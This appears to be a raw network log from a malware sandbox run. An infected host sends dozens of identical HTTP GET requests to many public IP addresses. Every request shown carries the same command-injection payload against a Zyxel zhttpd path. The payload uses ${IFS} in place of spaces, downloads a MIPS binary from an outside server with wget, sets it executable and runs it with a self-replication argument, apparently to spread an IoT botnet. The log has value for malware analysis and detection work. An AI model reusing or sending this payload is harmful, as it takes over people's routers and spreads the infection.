                                                Jan 29, 2024 07:07:52.431229115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5446192.168.2.234369293.59.129.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431283951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5447192.168.2.235615473.247.242.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431318998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5448192.168.2.2333140103.74.123.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431375027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5449192.168.2.2341154109.165.232.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431407928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5450192.168.2.2347814174.2.55.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431454897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5451192.168.2.2345658144.18.93.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431485891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5452192.168.2.2347136125.132.247.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431530952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5453192.168.2.234203218.170.247.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431565046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5454192.168.2.235350231.242.204.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431617022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5455192.168.2.233392269.230.16.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431651115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5456192.168.2.234665640.17.108.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431679010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5457192.168.2.2342604104.22.45.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431711912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5458192.168.2.2356724144.163.2.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431756973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5459192.168.2.235578439.58.153.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431802988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5460192.168.2.2351744147.117.255.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431857109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5461192.168.2.2355606183.187.96.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431885004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5462192.168.2.2356950122.195.44.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431941986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5463192.168.2.235248483.12.123.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.431987047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5464192.168.2.235651875.104.16.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432028055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5465192.168.2.2359140126.135.84.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432070017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5466192.168.2.233509667.101.168.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432127953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5467192.168.2.2340132178.110.231.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432157040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5468192.168.2.2350274152.62.132.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432192087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5469192.168.2.2360748190.54.110.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432240009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5470192.168.2.2339492158.82.227.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432265043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5471192.168.2.235158443.138.63.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432310104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5472192.168.2.2343854203.190.96.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432353020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5473192.168.2.2339032108.136.229.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432391882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5474192.168.2.233797238.241.241.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432427883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5475192.168.2.233855418.177.114.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432476997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5476192.168.2.23396582.235.11.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432507992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5477192.168.2.2344728165.189.73.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432539940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5478192.168.2.235912439.196.233.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432596922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5479192.168.2.23571845.242.111.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432622910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5480192.168.2.234558870.237.139.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432671070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5481192.168.2.2348064222.140.107.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432707071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5482192.168.2.2342642197.179.133.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432754040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5483192.168.2.2344436136.117.197.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432794094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5484192.168.2.2351840192.166.245.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432818890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5485192.168.2.2343002179.63.203.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432849884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5486192.168.2.2345504142.170.243.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432873011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5487192.168.2.2338220189.94.239.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432919979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5488192.168.2.235934435.134.188.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432946920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5489192.168.2.234299624.127.252.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.432996035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5490192.168.2.235515490.8.129.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433037996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5491192.168.2.2350254200.174.140.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433065891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5492192.168.2.235679040.22.8.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433126926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5493192.168.2.2352114186.106.199.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433178902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5494192.168.2.2344048165.174.185.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433234930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5495192.168.2.2346622119.80.29.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433258057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5496192.168.2.235214862.204.103.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433320999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5497192.168.2.2337726199.126.205.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433358908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5498192.168.2.2333736117.133.171.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433389902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5499192.168.2.2336292216.246.197.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433418989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5500192.168.2.2349826218.255.108.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433473110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5501192.168.2.2357420183.126.100.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433506012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5502192.168.2.2355156160.242.192.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433553934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5503192.168.2.2348628101.163.250.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433594942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5504192.168.2.2335424108.219.212.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433624029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5505192.168.2.2334426130.44.0.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433681011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5506192.168.2.2348520222.171.241.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433712006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5507192.168.2.23337809.34.140.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433741093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5508192.168.2.234414650.96.38.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433785915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5509192.168.2.2360392148.221.93.159443
                                                TimestampBytes transferredDirectionData
